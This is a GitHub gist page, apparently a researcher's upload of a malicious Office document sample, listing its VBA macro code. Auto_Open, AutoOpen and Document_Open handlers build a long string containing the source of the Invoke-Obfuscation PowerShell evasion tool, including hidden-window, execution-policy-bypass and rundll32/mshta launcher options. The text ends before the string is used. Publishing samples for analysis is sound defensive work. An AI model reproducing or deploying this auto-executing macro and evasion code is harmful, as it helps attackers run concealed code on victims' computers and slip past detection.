Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/b41a2cc5e2975e51b411305215a49d921b0fdf697d6e6d67ccb9bade99850e3c

Created November 7, 2018 19:17
Show Gist options
  • Save JohnLaTwC/650507c9d8a08dbf88312077fdd5b327 to your computer and use it in GitHub Desktop.
Save JohnLaTwC/650507c9d8a08dbf88312077fdd5b327 to your computer and use it in GitHub Desktop.
Download ZIP
VBA + Invoke-Obfuscation
Raw
b41a2cc5e2975e51b411305215a49d921b0fdf697d6e6d67ccb9bade99850e3c
## Uploaded by @JohnLaTwC
## Sample hash: b41a2cc5e2975e51b411305215a49d921b0fdf697d6e6d67ccb9bade99850e3c
Sub Auto_Open()
OMq
End Sub
Sub AutoOpen()
OMq
End Sub
Sub Document_Open()
OMq
End Sub
Public Function OMq() As Variant
Dim Ouzw As String
Ouzw = "# This file is part of Invoke-Obfuscation.
#
# "
Ouzw = Ouzw + " Copyright 2017 Daniel Bohannon <@danielhbohannon>"
Ouzw = Ouzw + "
# while at Mandiant <http://www.mandiant."
Ouzw = Ouzw + "com>
#
# Licensed under the Apache License, Vers"
Ouzw = Ouzw + "ion 2.0 (the "License");
# you may not use this "
Ouzw = Ouzw + "file except in compliance with the License.
# Yo"
Ouzw = Ouzw + "u may obtain a copy of the License at
#
# ht"
Ouzw = Ouzw + "tp://www.apache.org/licenses/LICENSE-2.0
#
# Unl"
Ouzw = Ouzw + "ess required by applicable law or agreed to in wri"
Ouzw = Ouzw + "ting, software
# distributed under the License i"
Ouzw = Ouzw + "s distributed on an "AS IS" BASIS,
# WITHOUT WAR"
Ouzw = Ouzw + "RANTIES OR CONDITIONS OF ANY KIND, either express "
Ouzw = Ouzw + "or implied.
# See the License for the specific l"
Ouzw = Ouzw + "anguage governing permissions and
# limitations "
Ouzw = Ouzw + "under the License.
Function Invoke-Obfuscation
"
Ouzw = Ouzw + "{
<#
.SYNOPSIS
Master function that orchestrates "
Ouzw = Ouzw + "the application of all obfuscation functions to pr"
Ouzw = Ouzw + "ovided PowerShell script block or script path cont"
Ouzw = Ouzw + "ents. Interactive mode enables one to explore all "
Ouzw = Ouzw + "available obfuscation functions and apply them inc"
Ouzw = Ouzw + "rementally to input PowerShell script block or scr"
Ouzw = Ouzw + "ipt path contents.
Invoke-Obfuscation Function: I"
Ouzw = Ouzw + "nvoke-Obfuscation
Author: Daniel Bohannon (@daniel"
Ouzw = Ouzw + "hbohannon)
License: Apache License, Version 2.0
Re"
Ouzw = Ouzw + "quired Dependencies: Show-AsciiArt, Show-HelpMenu,"
Ouzw = Ouzw + " Show-Menu, Show-OptionsMenu, Show-Tutorial and Ou"
Ouzw = Ouzw + "t-ScriptContents (all located in Invoke-Obfuscatio"
Ouzw = Ouzw + "n.ps1)
Optional Dependencies: None
.DESCRIPTION
"
Ouzw = Ouzw + "
Invoke-Obfuscation orchestrates the application o"
Ouzw = Ouzw + "f all obfuscation functions to provided PowerShell"
Ouzw = Ouzw + " script block or script path contents to evade det"
Ouzw = Ouzw + "ection by simple IOCs and process execution monito"
Ouzw = Ouzw + "ring relying solely on command-line arguments and "
Ouzw = Ouzw + "common parent-child process relationships.
.PARAM"
Ouzw = Ouzw + "ETER ScriptBlock
Specifies a scriptblock containi"
Ouzw = Ouzw + "ng your payload.
.PARAMETER ScriptPath
Specifies"
Ouzw = Ouzw + " the path to your payload (can be local file, UNC-"
Ouzw = Ouzw + "path, or remote URI).
.PARAMETER Command
Specifi"
Ouzw = Ouzw + "es the obfuscation commands to run against the inp"
Ouzw = Ouzw + "ut ScriptBlock or ScriptPath parameter.
.PARAMETE"
Ouzw = Ouzw + "R NoExit
(Optional - only works if Command is spe"
Ouzw = Ouzw + "cified) Outputs the option to not exit after runni"
Ouzw = Ouzw + "ng obfuscation commands defined in Command paramet"
Ouzw = Ouzw + "er.
.PARAMETER Quiet
(Optional - only works if C"
Ouzw = Ouzw + "ommand is specified) Outputs the option to output "
Ouzw = Ouzw + "only the final obfuscated result via stdout.
.EXA"
Ouzw = Ouzw + "MPLE
C:\PS> Import-Module .\Invoke-Obfuscation.ps"
Ouzw = Ouzw + "d1; Invoke-Obfuscation
C:\PS> Import-Module .\Inv"
Ouzw = Ouzw + "oke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBl"
Ouzw = Ouzw + "ock {Write-Host 'Hello World!' -ForegroundColor Gr"
Ouzw = Ouzw + "een; Write-Host 'Obfuscation Rocks!' -ForegroundCo"
Ouzw = Ouzw + "lor Green}
C:\PS> Import-Module .\Invoke-Obfuscat"
Ouzw = Ouzw + "ion.psd1; Invoke-Obfuscation -ScriptBlock {Write-H"
Ouzw = Ouzw + "ost 'Hello World!' -ForegroundColor Green; Write-H"
Ouzw = Ouzw + "ost 'Obfuscation Rocks!' -ForegroundColor Green} -"
Ouzw = Ouzw + "Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,"
Ouzw = Ouzw + "CLIP'
C:\PS> Import-Module .\Invoke-Obfuscation.p"
Ouzw = Ouzw + "sd1; Invoke-Obfuscation -ScriptBlock {Write-Host '"
Ouzw = Ouzw + "Hello World!' -ForegroundColor Green; Write-Host '"
Ouzw = Ouzw + "Obfuscation Rocks!' -ForegroundColor Green} -Comma"
Ouzw = Ouzw + "nd 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'"
Ouzw = Ouzw + " -NoExit
C:\PS> Import-Module .\Invoke-Obfuscatio"
Ouzw = Ouzw + "n.psd1; Invoke-Obfuscation -ScriptBlock {Write-Hos"
Ouzw = Ouzw + "t 'Hello World!' -ForegroundColor Green; Write-Hos"
Ouzw = Ouzw + "t 'Obfuscation Rocks!' -ForegroundColor Green} -Co"
Ouzw = Ouzw + "mmand 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CL"
Ouzw = Ouzw + "IP' -Quiet
C:\PS> Import-Module .\Invoke-Obfuscat"
Ouzw = Ouzw + "ion.psd1; Invoke-Obfuscation -ScriptBlock {Write-H"
Ouzw = Ouzw + "ost 'Hello World!' -ForegroundColor Green; Write-H"
Ouzw = Ouzw + "ost 'Obfuscation Rocks!' -ForegroundColor Green} -"
Ouzw = Ouzw + "Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,"
Ouzw = Ouzw + "CLIP' -NoExit -Quiet
.NOTES
Invoke-Obfuscation o"
Ouzw = Ouzw + "rchestrates the application of all obfuscation fun"
Ouzw = Ouzw + "ctions to provided PowerShell script block or scri"
Ouzw = Ouzw + "pt path contents to evade detection by simple IOCs"
Ouzw = Ouzw + " and process execution monitoring relying solely o"
Ouzw = Ouzw + "n command-line arguments.
This is a personal proje"
Ouzw = Ouzw + "ct developed by Daniel Bohannon while an employee "
Ouzw = Ouzw + "at MANDIANT, A FireEye Company.
.LINK
http://www"
Ouzw = Ouzw + ".danielbohannon.com
#>
[CmdletBinding(Default"
Ouzw = Ouzw + "ParameterSetName = 'ScriptBlock')] Param (
"
Ouzw = Ouzw + " [Parameter(Position = 0, ValueFromPipeline = $Tru"
Ouzw = Ouzw + "e, ParameterSetName = 'ScriptBlock')]
[Val"
Ouzw = Ouzw + "idateNotNullOrEmpty()]
[ScriptBlock]
"
Ouzw = Ouzw + " $ScriptBlock,
[Parameter(Position = 0,"
Ouzw = Ouzw + " ParameterSetName = 'ScriptBlock')]
[Valid"
Ouzw = Ouzw + "ateNotNullOrEmpty()]
[String]
$Scr"
Ouzw = Ouzw + "iptPath,
[String]
$Comman"
Ouzw = Ouzw + "d,
[Switch]
$NoExit,
"
Ouzw = Ouzw + "
[Switch]
$Quiet
)
# "
Ouzw = Ouzw + "Define variables for CLI functionality.
$Scrip"
Ouzw = Ouzw + "t:CliCommands = @()
$Script:CompoundComm"
Ouzw = Ouzw + "and = @()
$Script:QuietWasSpecified = $FALSE"
Ouzw = Ouzw + "
$CliWasSpecified = $FALSE
$NoExi"
Ouzw = Ouzw + "tWasSpecified = $FALSE
# Either convert"
Ouzw = Ouzw + " ScriptBlock to a String or convert script at $Pat"
Ouzw = Ouzw + "h to a String.
If($PSBoundParameters['ScriptBl"
Ouzw = Ouzw + "ock'])
{
$Script:CliCommands += ('set "
Ouzw = Ouzw + "scriptblock ' + [String]$ScriptBlock)
}
If"
Ouzw = Ouzw + "($PSBoundParameters['ScriptPath'])
{
$"
Ouzw = Ouzw + "Script:CliCommands += ('set scriptpath ' + $Script"
Ouzw = Ouzw + "Path)
}
# Append Command to CliCommands i"
Ouzw = Ouzw + "f specified by user input.
If($PSBoundParamete"
Ouzw = Ouzw + "rs['Command'])
{
$Script:CliCommands +"
Ouzw = Ouzw + "= $Command.Split(',')
$CliWasSpecified = $"
Ouzw = Ouzw + "TRUE
If($PSBoundParameters['NoExit'])
"
Ouzw = Ouzw + " {
$NoExitWasSpecified = $TRUE
"
Ouzw = Ouzw + " }
If($PSBoundParameters['Quiet'])
"
Ouzw = Ouzw + " {
# Create empty Write-Host and "
Ouzw = Ouzw + "Start-Sleep proxy functions to cause any Write-Hos"
Ouzw = Ouzw + "t or Start-Sleep invocations to not do anything un"
Ouzw = Ouzw + "til non-interactive -Command values are finished b"
Ouzw = Ouzw + "eing processed.
Function Write-Host {}"
Ouzw = Ouzw + "
Function Start-Sleep {}
$"
Ouzw = Ouzw + "Script:QuietWasSpecified = $TRUE
}
}
"
Ouzw = Ouzw + " ########################################
#"
Ouzw = Ouzw + "# Script-wide variable instantiation ##
######"
Ouzw = Ouzw + "##################################
# Script-l"
Ouzw = Ouzw + "evel array of Show Options menu, set as SCRIPT-lev"
Ouzw = Ouzw + "el so it can be set from within any of the functio"
Ouzw = Ouzw + "ns.
# Build out menu for Show Options selectio"
Ouzw = Ouzw + "n from user in Show-OptionsMenu menu.
$Script:"
Ouzw = Ouzw + "ScriptPath = ''
$Script:ScriptBlock = ''
"
Ouzw = Ouzw + " $Script:CliSyntax = @()
$Script:Exec"
Ouzw = Ouzw + "utionCommands = @()
$Script:ObfuscatedCommand "
Ouzw = Ouzw + "= ''
$Script:ObfuscatedCommandHistory = @()
"
Ouzw = Ouzw + " $Script:ObfuscationLength = ''
$Script:Optio"
Ouzw = Ouzw + "nsMenu = @()
$Script:OptionsMenu += , @('Scr"
Ouzw = Ouzw + "iptPath ' , $Script:ScriptPath , $TRUE"
Ouzw = Ouzw + ")
$Script:OptionsMenu += , @('ScriptBlock' "
Ouzw = Ouzw + " , $Script:ScriptBlock , $TRUE)
$Script"
Ouzw = Ouzw + ":OptionsMenu += , @('CommandLineSyntax' , $Script:"
Ouzw = Ouzw + "CliSyntax , $FALSE)
$Script:OptionsMenu"
Ouzw = Ouzw + " += , @('ExecutionCommands' , $Script:ExecutionCom"
Ouzw = Ouzw + "mands, $FALSE)
$Script:OptionsMenu += , @('Obf"
Ouzw = Ouzw + "uscatedCommand' , $Script:ObfuscatedCommand, $FALS"
Ouzw = Ouzw + "E)
$Script:OptionsMenu += , @('ObfuscationLeng"
Ouzw = Ouzw + "th' , $Script:ObfuscatedCommand, $FALSE)
# Bui"
Ouzw = Ouzw + "ld out $SetInputOptions from above items set as $T"
Ouzw = Ouzw + "RUE (as settable).
$SettableInputOptions = @()"
Ouzw = Ouzw + "
ForEach($Option in $Script:OptionsMenu)
{"
Ouzw = Ouzw + "
If($Option[2]) {$SettableInputOptions += "
Ouzw = Ouzw + "([String]$Option[0]).ToLower().Trim()}
}
"
Ouzw = Ouzw + "# Script-level variable for whether LAUNCHER has b"
Ouzw = Ouzw + "een applied to current ObfuscatedToken.
$Scrip"
Ouzw = Ouzw + "t:LauncherApplied = $FALSE
# Ensure Invoke-Ob"
Ouzw = Ouzw + "fuscation module was properly imported before cont"
Ouzw = Ouzw + "inuing.
If(!(Get-Module Invoke-Obfuscation | W"
Ouzw = Ouzw + "here-Object {$_.ModuleType -eq 'Manifest'}))
{"
Ouzw = Ouzw + "
$PathTopsd1 = "$ScriptDir\Invoke-Obfuscat"
Ouzw = Ouzw + "ion.psd1"
If($PathTopsd1.Contains(' ')) {$"
Ouzw = Ouzw + "PathTopsd1 = '"' + $PathTopsd1 + '"'}
Writ"
Ouzw = Ouzw + "e-Host "`n`nERROR: Invoke-Obfuscation module is no"
Ouzw = Ouzw + "t loaded. You must run:" -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " Import-Module $PathTopsd1`n"
Ouzw = Ouzw + "`n" -ForegroundColor Yellow
Exit
}
"
Ouzw = Ouzw + " # Maximum size for cmd.exe and clipboard.
$C"
Ouzw = Ouzw + "mdMaxLength = 8190
# Build interactive me"
Ouzw = Ouzw + "nus.
$LineSpacing = '[*] '
# Main Men"
Ouzw = Ouzw + "u.
$MenuLevel = @()
$MenuLevel+= , @($Li"
Ouzw = Ouzw + "neSpacing, 'TOKEN' , 'Obfuscate PowerShell comm"
Ouzw = Ouzw + "and <Tokens>')
$MenuLevel+= , @($LineSpacing, "
Ouzw = Ouzw + "'STRING' , 'Obfuscate entire command as a <Strin"
Ouzw = Ouzw + "g>')
$MenuLevel+= , @($LineSpacing, 'ENCODING'"
Ouzw = Ouzw + " , 'Obfuscate entire command via <Encoding>')
"
Ouzw = Ouzw + "$MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfus"
Ouzw = Ouzw + "cate command args w/<Launcher> techniques (run onc"
Ouzw = Ouzw + "e at end)')
# Main\Token Menu.
$MenuL"
Ouzw = Ouzw + "evel_Token = @()
$MenuLevel_"
Ouzw = Ouzw + "Token += , @($LineSpacing, 'STRING'"
Ouzw = Ouzw + " , 'Obfuscate <String> tokens (suggested to ru"
Ouzw = Ouzw + "n first)')
$MenuLevel_Token += "
Ouzw = Ouzw + ", @($LineSpacing, 'COMMAND' , 'Obfuscate <Comma"
Ouzw = Ouzw + "nd> tokens')
$MenuLevel_Token +"
Ouzw = Ouzw + "= , @($LineSpacing, 'ARGUMENT' , 'Obfuscate <Arg"
Ouzw = Ouzw + "ument> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'MEMBER' , 'Obfuscate <"
Ouzw = Ouzw + "Member> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'VARIABLE' , 'Obfuscate "
Ouzw = Ouzw + "<Variable> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'TYPE ' , 'Obfusca"
Ouzw = Ouzw + "te <Type> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'COMMENT' , 'Remove a"
Ouzw = Ouzw + "ll <Comment> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'WHITESPACE' , 'Inser"
Ouzw = Ouzw + "t random <Whitespace> (suggested to run last)')
"
Ouzw = Ouzw + " $MenuLevel_Token += , @($LineSpac"
Ouzw = Ouzw + "ing, 'ALL ' , 'Select <All> choices from abo"
Ouzw = Ouzw + "ve (random order)')
$MenuLevel_Token_Stri"
Ouzw = Ouzw + "ng = @()
$MenuLevel_Token_String "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , "Concatenate --> "
Ouzw = Ouzw + "e.g. <('co'+'ffe'+'e')>" "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'String', 1))
"
Ouzw = Ouzw + " $MenuLevel_Token_String += , @($LineSpa"
Ouzw = Ouzw + "cing, '2' , "Reorder --> e.g. <('{1}{0}'-f'ffe"
Ouzw = Ouzw + "e','co')>" , @('Out-ObfuscatedT"
Ouzw = Ouzw + "okenCommand', 'String', 2))
$MenuLevel_To"
Ouzw = Ouzw + "ken_Command = @()
$MenuLevel_Token_C"
Ouzw = Ouzw + "ommand += , @($LineSpacing, '1' , 'Ticks "
Ouzw = Ouzw + " --> e.g. <Ne`w-O`Bject>' "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'Comman"
Ouzw = Ouzw + "d', 1))
$MenuLevel_Token_Command += , @"
Ouzw = Ouzw + "($LineSpacing, '2' , "Splatting + Concatenate --> "
Ouzw = Ouzw + "e.g. <&('Ne'+'w-Ob'+'ject')>" , @('Out-Ob"
Ouzw = Ouzw + "fuscatedTokenCommand', 'Command', 2))
$MenuLev"
Ouzw = Ouzw + "el_Token_Command += , @($LineSpacing, '3' ,"
Ouzw = Ouzw + " "Splatting + Reorder --> e.g. <&('{1}{0}'-f'b"
Ouzw = Ouzw + "ject','New-O')>" , @('Out-ObfuscatedTokenCommand"
Ouzw = Ouzw + "', 'Command', 3))
$MenuLevel_Token_Argume"
Ouzw = Ouzw + "nt = @()
$MenuLevel_Token_Argument "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , 'Random Case --> e."
Ouzw = Ouzw + "g. <nEt.weBclIenT>' ,"
Ouzw = Ouzw + " @('Out-ObfuscatedTokenCommand', 'CommandArgument'"
Ouzw = Ouzw + ", 1))
$MenuLevel_Token_Argument += , @($"
Ouzw = Ouzw + "LineSpacing, '2' , 'Ticks --> e.g. <nE`T.we`"
Ouzw = Ouzw + "Bc`lIe`NT>' , @('Out-Obfu"
Ouzw = Ouzw + "scatedTokenCommand', 'CommandArgument', 2))
$M"
Ouzw = Ouzw + "enuLevel_Token_Argument += , @($LineSpacing,"
Ouzw = Ouzw + " '3' , "Concatenate --> e.g. <('Ne'+'t.We'+'bClien"
Ouzw = Ouzw + "t')>" , @('Out-ObfuscatedTokenC"
Ouzw = Ouzw + "ommand', 'CommandArgument', 3))
$MenuLevel_Tok"
Ouzw = Ouzw + "en_Argument += , @($LineSpacing, '4' , "Reor"
Ouzw = Ouzw + "der --> e.g. <('{1}{0}'-f'bClient','Net.We')>""
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'Co"
Ouzw = Ouzw + "mmandArgument', 4))
$MenuLevel_Token_Memb"
Ouzw = Ouzw + "er = @()
$MenuLevel_Token_Member "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , 'Random Case --> "
Ouzw = Ouzw + "e.g. <dOwnLoAdsTRing>' "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'Member', 1))
"
Ouzw = Ouzw + " $MenuLevel_Token_Member += , @($LineSpa"
Ouzw = Ouzw + "cing, '2' , 'Ticks --> e.g. <d`Ow`NLoAd`STRi"
Ouzw = Ouzw + "n`g>' , @('Out-ObfuscatedT"
Ouzw = Ouzw + "okenCommand', 'Member', 2))
$MenuLevel_Token_M"
Ouzw = Ouzw + "ember += , @($LineSpacing, '3' , "Concaten"
Ouzw = Ouzw + "ate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>" "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'Member"
Ouzw = Ouzw + "', 3))
$MenuLevel_Token_Member += , @("
Ouzw = Ouzw + "$LineSpacing, '4' , "Reorder --> e.g. <('{1}{0"
Ouzw = Ouzw + "}'-f'dString','Downloa').Invoke()>" , @('Out-Obf"
Ouzw = Ouzw + "uscatedTokenCommand', 'Member', 4))
$Menu"
Ouzw = Ouzw + "Level_Token_Variable = @()
$MenuLevel"
Ouzw = Ouzw + "_Token_Variable += , @($LineSpacing, '1' , '"
Ouzw = Ouzw + "Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand',"
Ouzw = Ouzw + " 'Variable', 1))
$MenuLevel_Token_Type "
Ouzw = Ouzw + " = @()
$MenuLevel_Token_Type "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , "Type Cast + Concate"
Ouzw = Ouzw + "nate --> e.g. <[Type]('Con'+'sole')>" , "
Ouzw = Ouzw + "@('Out-ObfuscatedTokenCommand', 'Type', 1))
$M"
Ouzw = Ouzw + "enuLevel_Token_Type += , @($LineSpacing,"
Ouzw = Ouzw + " '2' , "Type Cast + Reordered --> e.g. <[Type]('"
Ouzw = Ouzw + "{1}{0}'-f'sole','Con')>" , @('Out-ObfuscatedTokenC"
Ouzw = Ouzw + "ommand', 'Type', 2))
$MenuLevel_Token_Whi"
Ouzw = Ouzw + "tespace = @()
$MenuLevel_Token_Whitespa"
Ouzw = Ouzw + "ce += , @($LineSpacing, '1' , "`tRandom Whites"
Ouzw = Ouzw + "pace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>" "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'RandomWhitesp"
Ouzw = Ouzw + "ace', 1))
$MenuLevel_Token_Comment "
Ouzw = Ouzw + " = @()
$MenuLevel_Token_Comment += ,"
Ouzw = Ouzw + " @($LineSpacing, '1' , "Remove Comments --> e.g."
Ouzw = Ouzw + " self-explanatory" , @('Out-"
Ouzw = Ouzw + "ObfuscatedTokenCommand', 'Comment', 1))
$Menu"
Ouzw = Ouzw + "Level_Token_All = @()
$MenuLevel"
Ouzw = Ouzw + "_Token_All += , @($LineSpacing, '1' , ""
Ouzw = Ouzw + "`tExecute <ALL> Token obfuscation techniques (rand"
Ouzw = Ouzw + "om order)" , @('Out-ObfuscatedTokenCommandAl"
Ouzw = Ouzw + "l', '', ''))
# Main\String Menu.
$Men"
Ouzw = Ouzw + "uLevel_String = @()
$MenuLeve"
Ouzw = Ouzw + "l_String += , @($LineSpacing, '1' , "
Ouzw = Ouzw + "'<Concatenate> entire command' "
Ouzw = Ouzw + " , @('Out-ObfuscatedStringCommand"
Ouzw = Ouzw + "', '', 1))
$MenuLevel_String += "
Ouzw = Ouzw + ", @($LineSpacing, '2' , '<Reorder> entire command "
Ouzw = Ouzw + "after concatenating' , @('Out"
Ouzw = Ouzw + "-ObfuscatedStringCommand', '', 2))
$MenuLevel_"
Ouzw = Ouzw + "String += , @($LineSpacing, '3' , '<"
Ouzw = Ouzw + "Reverse> entire command after concatenating' "
Ouzw = Ouzw + " , @('Out-ObfuscatedStringCommand',"
Ouzw = Ouzw + " '', 3))
# Main\Encoding Menu.
$MenuLevel"
Ouzw = Ouzw + "_Encoding = @()
$MenuLevel_Enco"
Ouzw = Ouzw + "ding += , @($LineSpacing, '1' , "`tEnc"
Ouzw = Ouzw + "ode entire command as <ASCII>" "
Ouzw = Ouzw + " , @('Out-EncodedAsciiCommand' "
Ouzw = Ouzw + " , '', ''))
$MenuLevel_Encoding +"
Ouzw = Ouzw + "= , @($LineSpacing, '2' , "`tEncode entire command"
Ouzw = Ouzw + " as <Hex>" , @('O"
Ouzw = Ouzw + "ut-EncodedHexCommand' , '', ''))
$"
Ouzw = Ouzw + "MenuLevel_Encoding += , @($LineSpacing"
Ouzw = Ouzw + ", '3' , "`tEncode entire command as <Octal>" "
Ouzw = Ouzw + " , @('Out-EncodedOctalCom"
Ouzw = Ouzw + "mand' , '', ''))
$MenuLevel_Encoding"
Ouzw = Ouzw + " += , @($LineSpacing, '4' , "`tEncode "
Ouzw = Ouzw + "entire command as <Binary>" "
Ouzw = Ouzw + " , @('Out-EncodedBinaryCommand' , "
Ouzw = Ouzw + "'', ''))
$MenuLevel_Encoding += , "
Ouzw = Ouzw + "@($LineSpacing, '5' , "`tEncrypt entire command as"
Ouzw = Ouzw + " <SecureString> (AES)" , @('Out-S"
Ouzw = Ouzw + "ecureStringCommand' , '', ''))
$Menu"
Ouzw = Ouzw + "Level_Encoding += , @($LineSpacing, '6"
Ouzw = Ouzw + "' , "`tEncode entire command as <BXOR>" "
Ouzw = Ouzw + " , @('Out-EncodedBXORCommand'"
Ouzw = Ouzw + " , '', ''))
$MenuLevel_Encoding "
Ouzw = Ouzw + " += , @($LineSpacing, '7' , "`tEncode enti"
Ouzw = Ouzw + "re command as <Special Characters>" "
Ouzw = Ouzw + " , @('Out-EncodedSpecialCharOnlyCommand' , '', "
Ouzw = Ouzw + "''))
$MenuLevel_Encoding += , @($L"
Ouzw = Ouzw + "ineSpacing, '8' , "`tEncode entire command as <Whi"
Ouzw = Ouzw + "tespace>" , @('Out-Encod"
Ouzw = Ouzw + "edWhitespaceCommand' , '', ''))
# Main\L"
Ouzw = Ouzw + "auncher Menu.
$MenuLevel_Launcher "
Ouzw = Ouzw + " = @()
$MenuLevel_Launcher += , "
Ouzw = Ouzw + "@($LineSpacing, 'PS' , "`t<PowerShell>""
Ouzw = Ouzw + ")
$MenuLevel_Launcher += , @($Line"
Ouzw = Ouzw + "Spacing, 'CMD' , '<Cmd> + PowerShell')
"
Ouzw = Ouzw + " $MenuLevel_Launcher += , @($LineSpa"
Ouzw = Ouzw + "cing, 'WMIC' , '<Wmic> + PowerShell')
"
Ouzw = Ouzw + " $MenuLevel_Launcher += , @($LineSpaci"
Ouzw = Ouzw + "ng, 'RUNDLL' , '<Rundll32> + PowerShell')
"
Ouzw = Ouzw + " $MenuLevel_Launcher += , @($LineSpa"
Ouzw = Ouzw + "cing, 'VAR+' , 'Cmd + set <Var> && PowerS"
Ouzw = Ouzw + "hell iex <Var>')
$MenuLevel_Launcher "
Ouzw = Ouzw + " += , @($LineSpacing, 'STDIN+' , 'Cmd + <"
Ouzw = Ouzw + "Echo> | PowerShell - (stdin)')
$MenuLevel_Laun"
Ouzw = Ouzw + "cher += , @($LineSpacing, 'CLIP+' "
Ouzw = Ouzw + " , 'Cmd + <Echo> | Clip && PowerShell iex <clip"
Ouzw = Ouzw + "board>')
$MenuLevel_Launcher += , "
Ouzw = Ouzw + "@($LineSpacing, 'VAR++' , 'Cmd + set <Var>"
Ouzw = Ouzw + " && Cmd && PowerShell iex <Var>')
$MenuLevel_L"
Ouzw = Ouzw + "auncher += , @($LineSpacing, 'STDIN++'"
Ouzw = Ouzw + " , 'Cmd + set <Var> && Cmd <Echo> | PowerShe"
Ouzw = Ouzw + "ll - (stdin)')
$MenuLevel_Launcher "
Ouzw = Ouzw + " += , @($LineSpacing, 'CLIP++' , 'Cmd + <Ec"
Ouzw = Ouzw + "ho> | Clip && Cmd && PowerShell iex <clipboard>')
"
Ouzw = Ouzw + " $MenuLevel_Launcher += , @($LineSp"
Ouzw = Ouzw + "acing, 'RUNDLL++' , 'Cmd + set Var && <Rundll"
Ouzw = Ouzw + "32> && PowerShell iex Var')
$MenuLevel_Launche"
Ouzw = Ouzw + "r += , @($LineSpacing, 'MSHTA++' "
Ouzw = Ouzw + " , 'Cmd + set Var && <Mshta> && PowerShell iex Var"
Ouzw = Ouzw + "')
$MenuLevel_Launcher_PS = @()
"
Ouzw = Ouzw + " $MenuLevel_Launcher_PS += , @("Enter s"
Ouzw = Ouzw + "tring of numbers with all desired flags to pass to"
Ouzw = Ouzw + " function. (e.g. 23459)`n", '' , '' , @('', '',"
Ouzw = Ouzw + " ''))
$MenuLevel_Launcher_PS += , @($"
Ouzw = Ouzw + "LineSpacing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShell"
Ouzw = Ouzw + "Launcher', '', '1'))
$MenuLevel_Launcher_PS "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @("
Ouzw = Ouzw + "'Out-PowerShellLauncher', '', '1'))
$MenuLevel"
Ouzw = Ouzw + "_Launcher_PS += , @($LineSpacing, '2' , '"
Ouzw = Ouzw + "-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '1'))"
Ouzw = Ouzw + "
$MenuLevel_Launcher_PS += , @($LineS"
Ouzw = Ouzw + "pacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunc"
Ouzw = Ouzw + "her', '', '1'))
$MenuLevel_Launcher_PS "
Ouzw = Ouzw + " += , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-"
Ouzw = Ouzw + "PowerShellLauncher', '', '1'))
$MenuLevel_Laun"
Ouzw = Ouzw + "cher_PS += , @($LineSpacing, '5' , '-Comm"
Ouzw = Ouzw + "and' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '1'))
"
Ouzw = Ouzw + "$MenuLevel_Launcher_PS += , @($LineSpacin"
Ouzw = Ouzw + "g, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher',"
Ouzw = Ouzw + " '', '1'))
$MenuLevel_Launcher_PS += "
Ouzw = Ouzw + ", @($LineSpacing, '7' , '-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-Power"
Ouzw = Ouzw + "ShellLauncher', '', '1'))
$MenuLevel_Launcher_"
Ouzw = Ouzw + "PS += , @($LineSpacing, '8' , '-Wow64 (to"
Ouzw = Ouzw + " path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '1'))
$Men"
Ouzw = Ouzw + "uLevel_Launcher_CMD = @()
$MenuLeve"
Ouzw = Ouzw + "l_Launcher_CMD += , @("Enter string of num"
Ouzw = Ouzw + "bers with all desired flags to pass to function. ("
Ouzw = Ouzw + "e.g. 23459)`n", '' , '' , @('', '', ''))
$M"
Ouzw = Ouzw + "enuLevel_Launcher_CMD += , @($LineSpacing,"
Ouzw = Ouzw + " '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '"
Ouzw = Ouzw + "', '2'))
$MenuLevel_Launcher_CMD += , "
Ouzw = Ouzw + "@($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-PowerSh"
Ouzw = Ouzw + "ellLauncher', '', '2'))
$MenuLevel_Launcher_CM"
Ouzw = Ouzw + "D += , @($LineSpacing, '2' , '-NonInteract"
Ouzw = Ouzw + "ive' ,"
Ouzw = Ouzw + " @('Out-PowerShellLauncher', '', '2'))
$MenuLe"
Ouzw = Ouzw + "vel_Launcher_CMD += , @($LineSpacing, '3' "
Ouzw = Ouzw + ", '-NoLogo' "
